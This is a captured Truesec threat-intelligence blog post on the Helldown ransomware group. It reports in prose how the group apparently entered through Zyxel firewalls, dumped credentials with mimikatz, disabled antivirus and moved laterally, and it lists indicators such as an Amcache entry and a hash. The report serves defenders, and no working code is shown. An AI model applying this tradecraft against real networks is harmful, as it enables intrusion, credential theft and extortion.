www.truesec.com
Open in
urlscan Pro
185.195.92.48
Public Scan
URL:
https://www.truesec.com/hub/blog/helldown-ransomware-group
Submission: On November 21 via api from IN — Scanned from DE
Submission: On November 21 via api from IN — Scanned from DE
Form analysis 6 forms found in the DOM
<form data-hs-cf-bound="true">
<fieldset>
<legend class="visuallyhidden">Consent Selection</legend>
<div id="CybotCookiebotDialogBodyFieldsetInnerContainer">
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonNecessary"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Necessary</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper CybotCookiebotDialogBodyLevelButtonSliderWrapperDisabled"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonNecessary"
class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelButtonDisabled" disabled="disabled" checked="checked"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonPreferences"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Preferences</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonPreferences" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonPreferencesInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonStatistics"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Statistics</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonStatistics" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonStatisticsInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonMarketing"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Marketing</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonMarketing" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonMarketingInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
</div>
</fieldset>
</form><form data-hs-cf-bound="true"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonNecessaryInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelButtonDisabled" disabled="disabled" checked="checked"> <span
class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form data-hs-cf-bound="true"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonPreferencesInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonPreferences" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form data-hs-cf-bound="true"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonStatisticsInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonStatistics" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form data-hs-cf-bound="true"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonMarketingInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonMarketing" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form class="CybotCookiebotDialogBodyLevelButtonSliderWrapper" data-hs-cf-bound="true"><input type="checkbox" id="CybotCookiebotDialogBodyContentCheckboxPersonalInformation" class="CybotCookiebotDialogBodyLevelButton"> <span
class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form>Text Content
* Consent
* Details
* [#IABV2SETTINGS#]
* About
THIS WEBSITE USES COOKIES
We use cookies and process data on this site to improve your experience and
understand how our site is used. You can choose to allow all, select specific
purposes, or decline. For details, please review our privacy policy.
Consent Selection
Necessary
Preferences
Statistics
Marketing
Show details
* Necessary 61
Necessary cookies help make a website usable by enabling basic functions like
page navigation and access to secure areas of the website. The website cannot
function properly without these cookies.
* Cookiebot
1
Learn more about this provider
1.gifUsed to count the number of sessions to the website, necessary for
optimizing CMP product delivery.
Maximum Storage Duration: SessionType: Pixel Tracker
* Google
6
Learn more about this provider
Some of the data collected by this provider is for the purposes of
personalization and measuring advertising effectiveness.
test_cookieUsed to check if the user's browser supports cookies.
Maximum Storage Duration: 1 dayType: HTTP Cookie
_GRECAPTCHAPending
Maximum Storage Duration: 180 daysType: HTTP Cookie
rc::aThis cookie is used to distinguish between humans and bots. This is
beneficial for the website, in order to make valid reports on the use of
their website.
Maximum Storage Duration: PersistentType: HTML Local Storage
rc::bThis cookie is used to distinguish between humans and bots.
Maximum Storage Duration: SessionType: HTML Local Storage
rc::cThis cookie is used to distinguish between humans and bots.
Maximum Storage Duration: SessionType: HTML Local Storage
rc::fThis cookie is used to distinguish between humans and bots.
Maximum Storage Duration: PersistentType: HTML Local Storage
* LinkedIn
4
Learn more about this provider
bcookieUsed in order to detect spam and improve the website's security.
Maximum Storage Duration: 1 yearType: HTTP Cookie
li_gcStores the user's cookie consent state for the current domain
Maximum Storage Duration: 180 daysType: HTTP Cookie
bscookie [x2]This cookie is used to identify the visitor through an
application. This allows the visitor to login to a website through their
LinkedIn application for example.
Maximum Storage Duration: 1 yearType: HTTP Cookie
* Stripe
6
Learn more about this provider
__stripe_midThis cookie is necessary for making credit card transactions
on the website. The service is provided by Stripe.com which allows online
transactions without storing any credit card information.
Maximum Storage Duration: 1 yearType: HTTP Cookie
__stripe_sidThis cookie is necessary for making credit card transactions
on the website. The service is provided by Stripe.com which allows online
transactions without storing any credit card information.
Maximum Storage Duration: 1 dayType: HTTP Cookie
mDetermines the device used to access the website. This allows the website
to be formatted accordingly.
Maximum Storage Duration: 400 daysType: HTTP Cookie
_abThis cookie is necessary for making credit card transactions on the
website. The service is provided by Stripe.com which allows online
transactions without storing any credit card information.
Maximum Storage Duration: SessionType: HTML Local Storage
_mfThis cookie is necessary for making credit card transactions on the
website. The service is provided by Stripe.com which allows online
transactions without storing any credit card information.
Maximum Storage Duration: SessionType: HTML Local Storage
idPending
Maximum Storage Duration: SessionType: HTML Local Storage
* assets-aws.teamtailor-cdn.com
1
cache-sprite-plyrThis cookie is necessary for the cache function. A cache
is used by the website to optimize the response time between the visitor
and the website. The cache is usually stored on the visitor’s browser.
Maximum Storage Duration: PersistentType: HTML Local Storage
* campaign.truesec.com
checkout.truesec.se
event.truesec.com
fi.truesec.com
files.truesec.com
hsforms.com
myfonts.net
assets-aws.teamtailor-cdn.com
securitysummit.truesec.com
t.co
us.truesec.com
vimeo.com
14
__cf_bm [x14]This cookie is used to distinguish between humans and bots.
This is beneficial for the website, in order to make valid reports on the
use of their website.
Maximum Storage Duration: 1 dayType: HTTP Cookie
* campaign.truesec.com
event.truesec.com
fi.truesec.com
files.truesec.com
securitysummit.truesec.com
us.truesec.com
6
__cfruid [x6]This cookie is a part of the services provided by Cloudflare
- Including load-balancing, deliverance of website content and serving DNS
connection for website operators.
Maximum Storage Duration: SessionType: HTTP Cookie
* checkout.truesec.com
2
PHPSESSIDPreserves user session state across page requests.
Maximum Storage Duration: SessionType: HTTP Cookie
storeApiNonceNecessary for the shopping cart functionality on the website.
Maximum Storage Duration: PersistentType: HTML Local Storage
* checkout.truesec.com
checkout.truesec.se
2
wpEmojiSettingsSupports [x2]This cookie is part of a bundle of cookies
which serve the purpose of content delivery and presentation. The cookies
keep the correct state of font, blog/picture sliders, color themes and
other website settings.
Maximum Storage Duration: SessionType: HTML Local Storage
* consent.cookiebot.com
live.truesec.com
15
CookieConsent [x15]Stores the user's cookie consent state for the current
domain
Maximum Storage Duration: 1 yearType: HTTP Cookie
* hsforms.com
vimeo.com
3
_cfuvid [x3]This cookie is a part of the services provided by Cloudflare -
Including load-balancing, deliverance of website content and serving DNS
connection for website operators.
Maximum Storage Duration: SessionType: HTTP Cookie
* securitysummit.se
1
wordpress_test_cookieUsed to check if the user's browser supports cookies.
Maximum Storage Duration: SessionType: HTTP Cookie
* Preferences 7
Preference cookies enable a website to remember information that changes the
way the website behaves or looks, like your preferred language or the region
that you are in.
* Cookiebot
2
Learn more about this provider
CookieConsentBulkSetting-# [x2]Enables cookie consent across multiple
websites
Maximum Storage Duration: PersistentType: HTML Local Storage
* LinkedIn
1
Learn more about this provider
lidcRegisters which server-cluster is serving the visitor. This is used in
context with load balancing, in order to optimize user experience.
Maximum Storage Duration: 1 dayType: HTTP Cookie
* de.truesec.com
www.truesec.com
www.truesec.fi
www.truesec.se
4
pll_language [x4]This cookie is used to determine the preferred language
of the visitor and sets the language accordingly on the website, if
possible.
Maximum Storage Duration: 1 yearType: HTTP Cookie
* Statistics 58
Statistic cookies help website owners to understand how visitors interact
with websites by collecting and reporting information anonymously.
* Hotjar
6
Learn more about this provider
_hjAbsoluteSessionInProgressThis cookie is used to count how many times a
website has been visited by different visitors - this is done by assigning
the visitor an ID, so the visitor does not get registered twice.
Maximum Storage Duration: SessionType: HTTP Cookie
_hjFirstSeenThis cookie is used to determine if the visitor has visited
the website before, or if it is a new visitor on the website.
Maximum Storage Duration: SessionType: HTTP Cookie
_hjIncludedInSessionSample_#Collects statistics on the visitor's visits to
the website, such as the number of visits, average time spent on the
website and what pages have been read.
Maximum Storage Duration: SessionType: HTTP Cookie
_hjSession_#Collects statistics on the visitor's visits to the website,
such as the number of visits, average time spent on the website and what
pages have been read.
Maximum Storage Duration: SessionType: HTTP Cookie
_hjSessionUser_#Collects statistics on the visitor's visits to the
website, such as the number of visits, average time spent on the website
and what pages have been read.
Maximum Storage Duration: 1 yearType: HTTP Cookie
_hjTLDTestRegisters statistical data on users' behaviour on the website.
Used for internal analytics by the website operator.
Maximum Storage Duration: SessionType: HTTP Cookie
* Hubspot
16
Learn more about this provider
__hssc [x4]Identifies if the cookie data needs to be updated in the
visitor's browser.
Maximum Storage Duration: 1 dayType: HTTP Cookie
__hssrc [x4]Used to recognise the visitor's browser upon reentry on the
website.
Maximum Storage Duration: SessionType: HTTP Cookie
__hstc [x4]Sets a unique ID for the session. This allows the website to
obtain data on visitor behaviour for statistical purposes.
Maximum Storage Duration: 180 daysType: HTTP Cookie
hubspotutk [x4]Sets a unique ID for the session. This allows the website
to obtain data on visitor behaviour for statistical purposes.
Maximum Storage Duration: 180 daysType: HTTP Cookie
* Leadfeeder
1
Learn more about this provider
https://#.#/Registers statistical data on users' behaviour on the website.
Used for internal analytics by the website operator.
Maximum Storage Duration: SessionType: Pixel Tracker
* LinkedIn
2
Learn more about this provider
AnalyticsSyncHistoryUsed in connection with data-synchronization with
third-party analysis service.
Maximum Storage Duration: 30 daysType: HTTP Cookie
ln_orRegisters statistical data on users' behaviour on the website. Used
for internal analytics by the website operator.
Maximum Storage Duration: 2 daysType: HTTP Cookie
* Matomo
25
Learn more about this provider
_pk_id# [x12]Collects statistics on the user's visits to the website, such
as the number of visits, average time spent on the website and what pages
have been read.
Maximum Storage Duration: 1 yearType: HTTP Cookie
_pk_ses# [x12]Used by Piwik Analytics Platform to track page requests from
the visitor during the session.
Maximum Storage Duration: 1 dayType: HTTP Cookie
_pk_ref#Used by Piwik Analytics Platform to identify the referring website
from which the visitor has come.
Maximum Storage Duration: 6 monthsType: HTTP Cookie
* Stripe
1
Learn more about this provider
1Registers data on visitors' website-behaviour. This is used for internal
analysis and website optimization.
Maximum Storage Duration: SessionType: HTML Local Storage
* Twitter Inc.
1
Learn more about this provider
personalization_idThis cookie is set by Twitter - The cookie allows the
visitor to share content from the website onto their Twitter profile.
Maximum Storage Duration: 400 daysType: HTTP Cookie
* truesec.com
truesec.fi
truesec.se
6
FPID [x3]Registers statistical data on users' behaviour on the website.
Used for internal analytics by the website operator.
Maximum Storage Duration: 400 daysType: HTTP Cookie
FPLC [x3]Registers a unique ID that is used to generate statistical data
on how the visitor uses the website.
Maximum Storage Duration: 1 dayType: HTTP Cookie
* Marketing 75
Marketing cookies are used to track visitors across websites. The intention
is to display ads that are relevant and engaging for the individual user and
thereby more valuable for publishers and third party advertisers.
* Meta Platforms, Inc.
4
Learn more about this provider
lastExternalReferrerDetects how the user reached the website by
registering their last URL-address.
Maximum Storage Duration: PersistentType: HTML Local Storage
lastExternalReferrerTimeDetects how the user reached the website by
registering their last URL-address.
Maximum Storage Duration: PersistentType: HTML Local Storage
_fbp [x2]Used by Facebook to deliver a series of advertisement products
such as real time bidding from third party advertisers.
Maximum Storage Duration: 3 monthsType: HTTP Cookie
* Google
6
Learn more about this provider
Some of the data collected by this provider is for the purposes of
personalization and measuring advertising effectiveness.
IDEUsed by Google DoubleClick to register and report the website user's
actions after viewing or clicking one of the advertiser's ads with the
purpose of measuring the efficacy of an ad and to present targeted ads to
the user.
Maximum Storage Duration: 400 daysType: HTTP Cookie
pagead/landing [x3]Collects data on visitor behaviour from multiple
websites, in order to present more relevant advertisement - This also
allows the website to limit the number of times that they are shown the
same advertisement.
Maximum Storage Duration: SessionType: Pixel Tracker
NIDPending
Maximum Storage Duration: 6 monthsType: HTTP Cookie
pagead/1p-user-list/#Tracks if the user has shown interest in specific
products or events across multiple websites and detects how the user
navigates between sites. This is used for measurement of advertisement
efforts and facilitates payment of referral-fees between websites.
Maximum Storage Duration: SessionType: Pixel Tracker
* Hubspot
3
Learn more about this provider
__ptq.gifSends data to the marketing platform Hubspot about the visitor's
device and behaviour. Tracks the visitor across devices and marketing
channels.
Maximum Storage Duration: SessionType: Pixel Tracker
__hmplCollects information on user preferences and/or interaction with
web-campaign content - This is used on CRM-campaign-platform used by
website owners for promoting events or products.
Maximum Storage Duration: PersistentType: HTML Local Storage
HUBLYTICS_EVENTS_53Collects data on visitor behaviour from multiple
websites, in order to present more relevant advertisement - This also
allows the website to limit the number of times that they are shown the
same advertisement.
Maximum Storage Duration: PersistentType: HTML Local Storage
* Leadfeeder
1
Learn more about this provider
(unnamed)Tracks the individual sessions on the website, allowing the
website to compile statistical data from multiple visits. This data can
also be used to create leads for marketing purposes.
Maximum Storage Duration: SessionType: Pixel Tracker
* LinkedIn
2
Learn more about this provider
li_sugrCollects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: 3 monthsType: HTTP Cookie
UserMatchHistoryEnsures visitor browsing-security by preventing cross-site
request forgery. This cookie is essential for the security of the website
and visitor.
Maximum Storage Duration: 30 daysType: HTTP Cookie
* Twitter Inc.
4
Learn more about this provider
i/adsct [x2]The cookie is used by Twitter.com in order to determine the
number of visitors accessing the website through Twitter advertisement
content.
Maximum Storage Duration: SessionType: Pixel Tracker
muc_adsCollects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: 400 daysType: HTTP Cookie
i/jot/embedsSets a unique ID for the visitor, that allows third party
advertisers to target the visitor with relevant advertisement. This
pairing service is provided by third party advertisement hubs, which
facilitates real-time bidding for advertisers.
Maximum Storage Duration: SessionType: Pixel Tracker
* YouTube
23
Learn more about this provider
#-#Used to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTML Local Storage
__Secure-ROLLOUT_TOKENPending
Maximum Storage Duration: 180 daysType: HTTP Cookie
iU5q-!O9@$Registers a unique ID to keep statistics of what videos from
YouTube the user has seen.
Maximum Storage Duration: SessionType: HTML Local Storage
LAST_RESULT_ENTRY_KEYUsed to track user’s interaction with embedded
content.
Maximum Storage Duration: SessionType: HTTP Cookie
LogsDatabaseV2:V#||LogsRequestsStoreUsed to track user’s interaction with
embedded content.
Maximum Storage Duration: PersistentType: IndexedDB
nextIdUsed to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTTP Cookie
remote_sidNecessary for the implementation and functionality of YouTube
video-content on the website.
Maximum Storage Duration: SessionType: HTTP Cookie
requestsUsed to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTTP Cookie
ServiceWorkerLogsDatabase#SWHealthLogNecessary for the implementation and
functionality of YouTube video-content on the website.
Maximum Storage Duration: PersistentType: IndexedDB
TESTCOOKIESENABLEDUsed to track user’s interaction with embedded content.
Maximum Storage Duration: 1 dayType: HTTP Cookie
VISITOR_INFO1_LIVETries to estimate the users' bandwidth on pages with
integrated YouTube videos.
Maximum Storage Duration: 180 daysType: HTTP Cookie
VISITOR_PRIVACY_METADATAStores the user's cookie consent state for the
current domain
Maximum Storage Duration: 180 daysType: HTTP Cookie
YSCRegisters a unique ID to keep statistics of what videos from YouTube
the user has seen.
Maximum Storage Duration: SessionType: HTTP Cookie
yt.innertube::nextIdRegisters a unique ID to keep statistics of what
videos from YouTube the user has seen.
Maximum Storage Duration: PersistentType: HTML Local Storage
ytidb::LAST_RESULT_ENTRY_KEYUsed to track user’s interaction with embedded
content.
Maximum Storage Duration: PersistentType: HTML Local Storage
YtIdbMeta#databasesUsed to track user’s interaction with embedded content.
Maximum Storage Duration: PersistentType: IndexedDB
yt-remote-cast-availableStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-cast-installedStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-connected-devicesStores the user's video player preferences
using embedded YouTube video
Maximum Storage Duration: PersistentType: HTML Local Storage
yt-remote-device-idStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: PersistentType: HTML Local Storage
yt-remote-fast-check-periodStores the user's video player preferences
using embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-session-appStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-session-nameStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
* checkout.truesec.com
7
sbjs_currentCollects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: SessionType: HTTP Cookie
sbjs_current_addCollects data on user behaviour and interaction in order
to optimize the website and make advertisement on the website more
relevant.
Maximum Storage Duration: SessionType: HTTP Cookie
sbjs_firstCollects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: SessionType: HTTP Cookie
sbjs_first_addCollects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: SessionType: HTTP Cookie
sbjs_migrationsCollects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: SessionType: HTTP Cookie
sbjs_sessionCollects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: 1 dayType: HTTP Cookie
sbjs_udataCollects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: SessionType: HTTP Cookie
* gtm.truesec.com
6
_ga [x3]Used to send data to Google Analytics about the visitor's device
and behavior. Tracks the visitor across devices and marketing channels.
Maximum Storage Duration: 2 yearsType: HTTP Cookie
_ga_# [x3]Used to send data to Google Analytics about the visitor's device
and behavior. Tracks the visitor across devices and marketing channels.
Maximum Storage Duration: 2 yearsType: HTTP Cookie
* sc.lfeeder.com
16
_lfa [x3]Used in context with Account-Based-Marketing (ABM). The cookie
registers data such as IP-addresses, time spent on the website and page
requests for the visit. This is used for retargeting of multiple users
rooting from the same IP-addresses. ABM usually facilitates B2B marketing
purposes.
Maximum Storage Duration: 1 yearType: HTTP Cookie
_lfa_test_cookie_stored [x9]Used in context with Account-Based-Marketing
(ABM). The cookie registers data such as IP-addresses, time spent on the
website and page requests for the visit. This is used for retargeting of
multiple users rooting from the same IP-addresses. ABM usually facilitates
B2B marketing purposes.
Maximum Storage Duration: SessionType: HTTP Cookie
_lfa [x2]Used in context with Account-Based-Marketing (ABM). The cookie
registers data such as IP-addresses, time spent on the website and page
requests for the visit. This is used for retargeting of multiple users
rooting from the same IP-addresses. ABM usually facilitates B2B marketing
purposes.
Maximum Storage Duration: PersistentType: HTML Local Storage
_lfa_expiry [x2]Contains the expiry-date for the cookie with corresponding
name.
Maximum Storage Duration: PersistentType: HTML Local Storage
* www.googletagmanager.com
gtm.truesec.com
3
_gcl_au [x3]Used by Google AdSense for experimenting with advertisement
efficiency across websites using their services.
Maximum Storage Duration: 3 monthsType: HTTP Cookie
* Unclassified 7
Unclassified cookies are cookies that we are in the process of classifying,
together with the providers of individual cookies.
* Hotjar
1
Learn more about this provider
hubspotutkPending
Maximum Storage Duration: PersistentType: HTML Local Storage
* Hubspot
1
Learn more about this provider
li_adsIdPending
Maximum Storage Duration: PersistentType: HTML Local Storage
* assets-aws.teamtailor-cdn.com
1
MESSENGER_STATEPending
Maximum Storage Duration: PersistentType: HTML Local Storage
* career.truesec.com
3
_tt_sessionPending
Maximum Storage Duration: 2 daysType: HTTP Cookie
_ttAnalyticsPending
Maximum Storage Duration: 6 monthsType: HTTP Cookie
_ttCookiePermissionsPending
Maximum Storage Duration: 6 monthsType: HTTP Cookie
* live.truesec.com
1
formstatesPending
Maximum Storage Duration: PersistentType: HTML Local Storage
Cross-domain consent18 Your consent applies to the following domains:
List of domains your consent applies to: lyyti.fi meet.truesec.com truesec.se
truesec.fi insights.truesec.com fi.truesec.com us.truesec.com de.truesec.com
career.truesec.com securitysummit.truesec.com event.truesec.com
checkout.truesec.se live.truesec.com securitysummit.se geekweek.truesec.com
checkout.truesec.com campaign.truesec.com truesec.com
Cookie declaration last updated on 14.11.24 by Cookiebot
[#IABV2_TITLE#]
[#IABV2_BODY_INTRO#]
[#IABV2_BODY_LEGITIMATE_INTEREST_INTRO#]
[#IABV2_BODY_PREFERENCE_INTRO#]
[#IABV2_LABEL_PURPOSES#]
[#IABV2_BODY_PURPOSES_INTRO#]
[#IABV2_BODY_PURPOSES#]
[#IABV2_LABEL_FEATURES#]
[#IABV2_BODY_FEATURES_INTRO#]
[#IABV2_BODY_FEATURES#]
[#IABV2_LABEL_PARTNERS#]
[#IABV2_BODY_PARTNERS_INTRO#]
[#IABV2_BODY_PARTNERS#]
Cookies are small text files that can be used by websites to make a user's
experience more efficient.
The law states that we can store cookies on your device if they are strictly
necessary for the operation of this site. For all other types of cookies we need
your permission.
This site uses different types of cookies. Some cookies are placed by third
party services that appear on our pages.
You can at any time change or withdraw your consent from the Cookie Declaration
on our website.
Learn more about who we are, how you can contact us and how we process personal
data in our Privacy Policy.
Please state your consent ID and date when you contact us regarding your
consent.
Do not sell or share my personal information
Deny Allow selection Customize
Allow all
Truesec
* Platform
* Services
* ServicesWe offer cyber breach management services across all affected
areas. Connect with a cybersecurity consultant for further details.Services
* Digital Forensics and Incident Response
* Incident Response
* Priority (IR) Retainer
* Managed Detection and Response
* MDR Core
* MDR Enterprise
* MDR Black
* Incident Preparedness
* Advisory and Workshops
* Incident Response Exercise
* Threat Intelligence
* Attack Prediction
* Early Warning Sensor
* Penetration Test
* Red Team
* Governance, Risk, and Compliance
* Cloud Security
* Cloud Security Posture Management
* Compliance (ISO27001, NIS2, NIST, DORA)
* Cyber Resilience Program
* Human Threat Intelligence
* Human Threat Intelligence Trainings
* Position Exposure Analysis
* Security Vetting Operations
* Travel & Event Security Support (TESS)
* Vulnerability and Posture Management
* Security Improvements and Mitigations
* Vulnerability Management
* Identity and Access Management (IAM)
* IAM Deployment
* Application Security
* Application Security Assessment
* Resources
* ResourcesCybersecurity is becoming increasingly important in today’s world.
Truesec providing explanations of a variety of cybersecurity topics.Explore
cyber topics
* InsightsDiscover the latest cybersecurity insights.
* Events and WebinarsCybersecurity webinars and events for tech professionals
and business leaders
* TrainingsExpand your knowledge with hands-on sessions in cybersecurity.
* CasesExplore our intriguing cybersecurity cases and solutions.
* GuidesCheck out our guides for valuable insights and effective strategies.
* ReportsGet insights into the latest trends and observations in the security
landscape.
* Company
* CompanyWe stay ahead of cybercriminals and find the best possible solution
for you. We prevent breach and minimize impact.Contact us
* Who We AreOne partner for all cybersecurity solutions.
* Our ExpertsIndustry-leading professionals with extensive experience and a
passion for defending against cyber threats.
* NewsroomStay current with the latest Truesec news.
* CareerJoin a highly skilled team of cybersecurity professionals.
* Cybersecurity CenterA collaborative hub for innovation, sharing knowledge,
and protecting society against digital threats.
* Talk to us!
* Under Attack
* Login
* English
* Deutsch
* Suomi
* Svenska
Threat Insight
HELLDOWN RANSOMWARE GROUP – A NEW EMERGING RANSOMWARE THREAT
During October 2024, the Truesec CSIRT team were engaged in incidents related a
newly emerged ransomware group – Helldown. As of November 2024, the online
resources available related to the Helldown ransomware group’s Tactics
Techniques and Procedures (TTP’s) were effectively none-existent – this blogpost
aims to address that and will be updated continuously as more investigations are
completed
* * Stephan Khader Boelt
* 2024-11-07
* Insight
SHARE
* Facebook
* Twitter
* LinkedIn
* Email
INTRODUCTION
The Helldown ransomware group have emerged as a new player in the ransomware
space during Q3 of 2024. Based on the victims listed on their leak-site, the
group has been agnostic regarding which sectors they have targeted, as the list
of victims contains museums, cargo transport companies, and notably the network
equipment manufacturer Zyxel.
The threat actor (TA) displayed a higher level of sophistication than for
example like the Akira ransomware group, in the early stages of their
compromises, and rely on living off the land techniques rather than employing a
C2 framework.
Recent incidents showed that the group will thoroughly remove tools utilized
during a compromise, as well as override the free disk space on the hard drive
of different machines, in attempts to hinder the recovery process and reduce the
effectiveness of file carving
Ransomware note
TECHNICAL DETAILS
INITIAL ACCESS
The Truesec CSIRT have primarily observed the Helldown ransomware group
obtaining initial access through Zyxel firewalls. More specifically, one
investigation showed that the TA would access the victim’s environment directly
from the LAN IP-address of their internet facing Zyxel firewall.
Based on tests conducted of victims externally facing firewalls, the default
behaviour should assign an authenticated SSL-VPN user an IP from a predefined
IP-address pool 10.10.11.0/24, and any traffic from a SSL-VPN connected client
towards the internal LAN would be sourced from that assigned IP-address. Despite
this expected behaviour, traffic was sourced from 192.168.1.1 when the TA
authenticated to any of the internal machines in the victims environment. The
forensic team was left unable to investigate the underlying operating system of
the compromised firewalls, and as such, were unable to positively confirm
weather the threat actor utilized the SSL-VPN service to access the victims
environment, or if the firewall device itself had been compromised via an
exploit. The evidence points towards the latter of the two options.
The same investigation also showed that a user account was created on the
externally facing firewall as part of the compromise. It was not confirmed if
the user was created during a possible exploitation of the operating system, or
post breach.
PERSISTENCE
During their compromise, the Helldown group was observed to have created local
accounts on the Zyxel firewalls [T1078.003] to establish persistence in the
victims environment.
CREDENTIAL ACCESS AND DISCOVERY
Helldown was observed to have employed mimikatz to dump credentials in the
victims active directory [T1003], as well as manually downloading Advanced Port
Scanner directly from GitHub, through either the web-browser or certutil.exe
[T1105], to perform network enumeration [T1046].
DEFENCE EVASION
Two methods of disabling local anti-virus were observed during recent
investigations. The first method was by manually disabling real-time protection
using powershell. The second method was by employing hrsword.exe to disable
endpoint protection software on a given machine [T1562.001].
LATERAL MOVEMENT
The TA was observed utilizing the default windows RDP client “mstsc.exe”, as
well as Teamviewer to conduct the majority of their activities and move around
the network [T1021.001]. Additionally, psexec.exe was also used to perform
program executions on remote machines.
IMPACT
The group deployed ransomware as part of their compromise, to blackmail victims
into paying an unspecified ransom [T1486]. Despite having performed a full AD
compromise, recent cases showed that they only deployed their own encrypter
“hellenc.exe” on specific machines in the environment.
RANSOMWARE EXECUTION ANALYSIS
The ransomware encrypter, named “hellenc.exe”, removed itself from the hard
drive during execution, and forced a system restart, only leaving meta data
behind. The most reliable sources of evidence of this file has been, Amcache or
Shimcache entries, while MFT and $J entries were missing on machines post
execution.
Evidence from a recent investigation showed an Amcache entry of the file,
providing a file size, and a timestamp for the most recent time it was compiled.
{
"ApplicationName": "Unassociated",
"ProgramId": "0006f430f38745a2af2bd0f21acc33e77f790000ffff",
"FileKeyLastWriteTimestamp": "REDACTED",
"SHA1": "2b88d6e9475fc1e035f8e49ebb5a79d3266eccc0",
"IsOsComponent": "False",
"FullPath": "c:\\users\\REDACTED\\desktop\\hellenc.exe",
"Name": "Hellenc.exe",
"FileExtension": ".exe",
"LinkDate": "2024-08-02 06:48:50",
"ProductName": "",
"Size": "669184",
"Version": "",
"ProductVersion": "",
"LongPathHash": "hellenc.exe|7c6c79ee2f8d3787",
"BinaryType": "pe32_i386",
"IsPeFile": "False",
}
Like other ransomware encryptors hellenc.exe added an extension to the encrypted
files, which was a randomized 6 letter extension using only upper- and
lower-case letters. Additionally, an accompanying .ico file (icon file) was
transferred to the system named “xx.ico”. Once the ransomware file executed, it
will add a registry key in the SOFTWARE hive pointing to the icon file under:
* SOFTWARE:ROOT\Classes\.[6-letter-extension]
* SOFTWARE:ROOT\Classes\[6-letter-extension]Icon
* SOFTWARE:ROOT\Classes\[6-letter-extension]Icon\DefaultIcon
Once the encryption completed, a system reboot was initiated and the ransomware
file was overwritten on disk.
OVERVIEW
TOOLS AND IOC’S
NameDescriptionSHA1-HashHellenc.exeRansomware
